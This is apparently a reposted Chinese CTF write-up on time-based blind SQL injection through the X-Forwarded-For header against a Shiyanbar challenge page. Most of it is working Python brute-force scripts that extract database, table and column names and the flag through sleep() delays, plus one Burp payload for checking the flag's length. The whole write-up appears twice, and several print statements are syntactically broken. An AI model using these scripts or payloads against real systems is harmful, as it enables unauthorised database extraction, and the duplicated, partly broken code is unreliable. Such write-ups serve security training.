sql注入:时间注入

原文:https://blog.csdn.net/dongyanwen6036/article/details/77815840

1.暴力求数据库名:

    # -*- coding:utf-8 -*-    
    import requests  
    import string   
    url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"  
    guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation  
    database=[]  
      
    for database_number in range(0,100):        #假设爆破前100个库  
        databasename=''  
        for i in range(1,100):                  #爆破字符串长度,假设不超过100长度  
            flag=0  
            for str in guess:                   #爆破该位置的字符  
                #print 'trying ',str  
                headers = {"X-forwarded-for":"'+"+" (select case when (substring((select schema_name from information_schema.SCHEMATA limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(database_number,i,str)}  
                try:  
                    res=requests.get(url,headers=headers,timeout=4)  
                except:  
                    databasename+=str  
                    flag=1  
                    print('正在扫描第%d个数据库名,the databasename now is '%(database_number+1) ,databasename)   
                    break  
            if flag==0:  
                break  
        database.append(databasename)  
        if i==1 and flag==0:  
            print('扫描完成')  
            break  
      
    for i in range(len(database)):  
        print(database[i])   



暴力求表名:

这里面需要提前知道,有information_sechma和web4,第一个在我的电脑上是有59列,但是也不知道他有几个…所以写个小脚本跑一下

[python] view plain copy
  1. # -*- coding:utf-8 -*-    
  2. #基于python3.0  
  3. import requests  
  4. import string   
  5. url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"  
  6. guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation  
  7. database=[]  
  8.   
  9. for table_number in range(0,500):     
  10.     print('trying',table_number)  
  11.     headers = {"X-forwarded-for":"'+"+" (select case when (select count(table_name) from information_schema.TABLES ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}  
  12.     try:  
  13.         res=requests.get(url,headers=headers,timeout=4)  
  14.     except:  
  15.         print(table_number)  
  16.         break  


可以得到有42(睁着眼睛说瞎话)个列…有点多啊…不过呢我们一般猜测都在最后,
前面的应该都是什么information_schema里的那个。尝试一下:

[python] view plain copy
  1. #基于python3.0  
  2. # -*- coding:utf-8 -*-    
  3. import requests  
  4. import string   
  5. url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"  
  6. guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation  
  7. tables=[]  
  8.   
  9. for table_number in range(42,43):           #假设从第60个开始  
  10.     tablename=''  
  11.     for i in range(1,100):                  #爆破字符串长度,假设不超过100长度  
  12.         flag=0  
  13.         for str in guess:                   #爆破该位置的字符  
  14.             headers = {"X-forwarded-for":"'+"+" (select case when (substring((select table_name from information_schema.TABLES limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(table_number,i,str)}  
  15.             try:  
  16.                 res=requests.get(url,headers=headers,timeout=4)  
  17.             except:  
  18.                 tablename+=str  
  19.                 flag=1  
  20.                 print('正在扫描第%d个数据库名,the tablename now is '%(table_number+1) ,tablename)  
  21.                 break  
  22.         if flag==0:  
  23.             break  
  24.     tables.append(tablename)  
  25.     if i==1 and flag==0:  
  26.         print ('扫描完成')  
  27.         break  
  28.   
  29. for i in range(len(tables)):  
  30.     print (tables[i])  


是他没毛病。

暴力求列名 :
其实直接猜是不是flag啊…不过还是可以暴力,因为是上面列的最后一个嘛,
所以关键字段肯定也是最后一个吧,老思路,看有几个列,然后暴力最后一个。
看有几个列

[python] view plain copy
  1. #基于python3.0  
  2. # -*- coding:utf-8 -*-    
  3. import requests  
  4. import string   
  5. url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"  
  6. guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation  
  7. database=[]  
  8.   
  9. for table_number in range(0,1000):    
  10.     print'trying',table_number)  
  11.     headers = {"X-forwarded-for":"'+"+" (select case when (select count(COLUMN_name) from information_schema.COLUMNS ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}  
  12.     try:  
  13.         res=requests.get(url,headers=headers,timeout=4)  
  14.     except:  
  15.         print (table_number)  
  16.         break  


[python] view plain copy
  1. #基于python3.0  
  2. # -*- coding:utf-8 -*-    
  3. import requests  
  4. import string   
  5. url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"  
  6. guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation  
  7. columns=[]  
  8.   
  9. for column_number in range(484,485):            #假设从第60个开始  
  10.     cloumnname=''  
  11.     for i in range(1,100):                  #爆破字符串长度,假设不超过100长度  
  12.         flag=0  
  13.         for str in guess:                   #爆破该位置的字符  
  14.             #print 'trying',str  
  15.             headers = {"X-forwarded-for":"'+"+" (select case when (substring((select COLUMN_name from information_schema.COLUMNS limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(column_number,i,str)}  
  16.             try:  
  17.                 res=requests.get(url,headers=headers,timeout=4)  
  18.             except:  
  19.                 cloumnname+=str  
  20.                 flag=1  
  21.                 print('正在扫描第%d个列名,the cloumnname now is '%(column_number+1) ,cloumnname)   
  22.                 break  
  23.         if flag==0:  
  24.             break  
  25.     columns.append(cloumnname)  
  26.     if i==1 and flag==0:  
  27.         print('扫描完成')   
  28.         break  
  29.   
  30. for i in range(len(columns)):  
  31.     print(columns[i])   


当改成其他的看看什么情况:



到这里我们确定了flag存储在flag表的flag字段里。

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
flag的长度为32(这个 长度验证见bp了)
事先验证flag记录的长度,用以下语句来注入:
1' and (select case when (select length(flag) from flag limit 1)=32 then sleep(5) else 1 end) and '1'='1
当点击Repeter的Go按钮,等待了约五秒,Go按钮从不可按状态转为可按状态,cancel按钮从可按状态转为不可按状态,
Reponse没有任何返回,且Burpsuite 的Alerts模块里新增一个Timeout的提示。就表明后台延时了5秒。
这就可以确定其长度为32了。
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

方法二:不需要知道长度直接暴力

[python] view plain copy
  1. #基于python3.0  
  2. #-*-coding:utf-8-*-  
  3. import requests  
  4. import string  
  5. url="http://ctf5.shiyanbar.com/web/wonderkun/index.php"  
  6. guess=string.ascii_lowercase + string.ascii_uppercase + string.digits  
  7. flag=""  
  8.   
  9. for i in range(1,100):  
  10.     havetry=0  
  11.     for str in guess:  
  12.         headers={"x-forwarded-for":"' +(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(7) else 1 end ) and '1'='1" %(i,str)}  
  13.         try:   
  14.             res=requests.get(url,headers=headers,timeout=6)  
  15.         except(requests.exceptions.ReadTimeout):  
  16.             havetry=1  
  17.             flag = flag + str  
  18.             print"flag:", flag)  
  19.             break  
  20.     if havetry==0:  
  21.         break  
  22. print'result:' + flag)  



终于写+测试完了,睡觉去咯。 [python] view plain copy
  1. # -*- coding:utf-8 -*-    
  2. import requests  
  3. import string   
  4. url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"  
  5. guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation  
  6. database=[]  
  7.   
  8. for database_number in range(0,100):        #假设爆破前100个库  
  9.     databasename=''  
  10.     for i in range(1,100):                  #爆破字符串长度,假设不超过100长度  
  11.         flag=0  
  12.         for str in guess:                   #爆破该位置的字符  
  13.             #print 'trying ',str  
  14.             headers = {"X-forwarded-for":"'+"+" (select case when (substring((select schema_name from information_schema.SCHEMATA limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(database_number,i,str)}  
  15.             try:  
  16.                 res=requests.get(url,headers=headers,timeout=4)  
  17.             except:  
  18.                 databasename+=str  
  19.                 flag=1  
  20.                 print('正在扫描第%d个数据库名,the databasename now is '%(database_number+1) ,databasename)   
  21.                 break  
  22.         if flag==0:  
  23.             break  
  24.     database.append(databasename)  
  25.     if i==1 and flag==0:  
  26.         print('扫描完成')  
  27.         break  
  28.   
  29. for i in range(len(database)):  
  30.     print(database[i])   


暴力求表名:

这里面需要提前知道,有information_sechma和web4,第一个在我的电脑上是有59列,但是也不知道他有几个…所以写个小脚本跑一下

[python] view plain copy
  1. # -*- coding:utf-8 -*-    
  2. #基于python3.0  
  3. import requests  
  4. import string   
  5. url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"  
  6. guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation  
  7. database=[]  
  8.   
  9. for table_number in range(0,500):     
  10.     print('trying',table_number)  
  11.     headers = {"X-forwarded-for":"'+"+" (select case when (select count(table_name) from information_schema.TABLES ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}  
  12.     try:  
  13.         res=requests.get(url,headers=headers,timeout=4)  
  14.     except:  
  15.         print(table_number)  
  16.         break  


可以得到有42(睁着眼睛说瞎话)个列…有点多啊…不过呢我们一般猜测都在最后,
前面的应该都是什么information_schema里的那个。尝试一下:

[python] view plain copy
  1. #基于python3.0  
  2. # -*- coding:utf-8 -*-    
  3. import requests  
  4. import string   
  5. url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"  
  6. guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation  
  7. tables=[]  
  8.   
  9. for table_number in range(42,43):           #假设从第60个开始  
  10.     tablename=''  
  11.     for i in range(1,100):                  #爆破字符串长度,假设不超过100长度  
  12.         flag=0  
  13.         for str in guess:                   #爆破该位置的字符  
  14.             headers = {"X-forwarded-for":"'+"+" (select case when (substring((select table_name from information_schema.TABLES limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(table_number,i,str)}  
  15.             try:  
  16.                 res=requests.get(url,headers=headers,timeout=4)  
  17.             except:  
  18.                 tablename+=str  
  19.                 flag=1  
  20.                 print('正在扫描第%d个数据库名,the tablename now is '%(table_number+1) ,tablename)  
  21.                 break  
  22.         if flag==0:  
  23.             break  
  24.     tables.append(tablename)  
  25.     if i==1 and flag==0:  
  26.         print ('扫描完成')  
  27.         break  
  28.   
  29. for i in range(len(tables)):  
  30.     print (tables[i])  


是他没毛病。

暴力求列名 :
其实直接猜是不是flag啊…不过还是可以暴力,因为是上面列的最后一个嘛,
所以关键字段肯定也是最后一个吧,老思路,看有几个列,然后暴力最后一个。
看有几个列

[python] view plain copy
  1. #基于python3.0  
  2. # -*- coding:utf-8 -*-    
  3. import requests  
  4. import string   
  5. url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"  
  6. guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation  
  7. database=[]  
  8.   
  9. for table_number in range(0,1000):    
  10.     print'trying',table_number)  
  11.     headers = {"X-forwarded-for":"'+"+" (select case when (select count(COLUMN_name) from information_schema.COLUMNS ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}  
  12.     try:  
  13.         res=requests.get(url,headers=headers,timeout=4)  
  14.     except:  
  15.         print (table_number)  
  16.         break  


[python] view plain copy
  1. #基于python3.0  
  2. # -*- coding:utf-8 -*-    
  3. import requests  
  4. import string   
  5. url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"  
  6. guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation  
  7. columns=[]  
  8.   
  9. for column_number in range(484,485):            #假设从第60个开始  
  10.     cloumnname=''  
  11.     for i in range(1,100):                  #爆破字符串长度,假设不超过100长度  
  12.         flag=0  
  13.         for str in guess:                   #爆破该位置的字符  
  14.             #print 'trying',str  
  15.             headers = {"X-forwarded-for":"'+"+" (select case when (substring((select COLUMN_name from information_schema.COLUMNS limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(column_number,i,str)}  
  16.             try:  
  17.                 res=requests.get(url,headers=headers,timeout=4)  
  18.             except:  
  19.                 cloumnname+=str  
  20.                 flag=1  
  21.                 print('正在扫描第%d个列名,the cloumnname now is '%(column_number+1) ,cloumnname)   
  22.                 break  
  23.         if flag==0:  
  24.             break  
  25.     columns.append(cloumnname)  
  26.     if i==1 and flag==0:  
  27.         print('扫描完成')   
  28.         break  
  29.   
  30. for i in range(len(columns)):  
  31.     print(columns[i])   


当改成其他的看看什么情况:



到这里我们确定了flag存储在flag表的flag字段里。

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
flag的长度为32(这个 长度验证见bp了)
事先验证flag记录的长度,用以下语句来注入:
1' and (select case when (select length(flag) from flag limit 1)=32 then sleep(5) else 1 end) and '1'='1
当点击Repeter的Go按钮,等待了约五秒,Go按钮从不可按状态转为可按状态,cancel按钮从可按状态转为不可按状态,
Reponse没有任何返回,且Burpsuite 的Alerts模块里新增一个Timeout的提示。就表明后台延时了5秒。
这就可以确定其长度为32了。
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

方法二:不需要知道长度直接暴力

[python] view plain copy
  1. #基于python3.0  
  2. #-*-coding:utf-8-*-  
  3. import requests  
  4. import string  
  5. url="http://ctf5.shiyanbar.com/web/wonderkun/index.php"  
  6. guess=string.ascii_lowercase + string.ascii_uppercase + string.digits  
  7. flag=""  
  8.   
  9. for i in range(1,100):  
  10.     havetry=0  
  11.     for str in guess:  
  12.         headers={"x-forwarded-for":"' +(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(7) else 1 end ) and '1'='1" %(i,str)}  
  13.         try:   
  14.             res=requests.get(url,headers=headers,timeout=6)  
  15.         except(requests.exceptions.ReadTimeout):  
  16.             havetry=1  
  17.             flag = flag + str  
  18.             print"flag:", flag)  
  19.             break  
  20.     if havetry==0:  
  21.         break  
  22. print'result:' + flag)  



终于写+测试完了,睡觉去咯。

你可能感兴趣的:(ctf)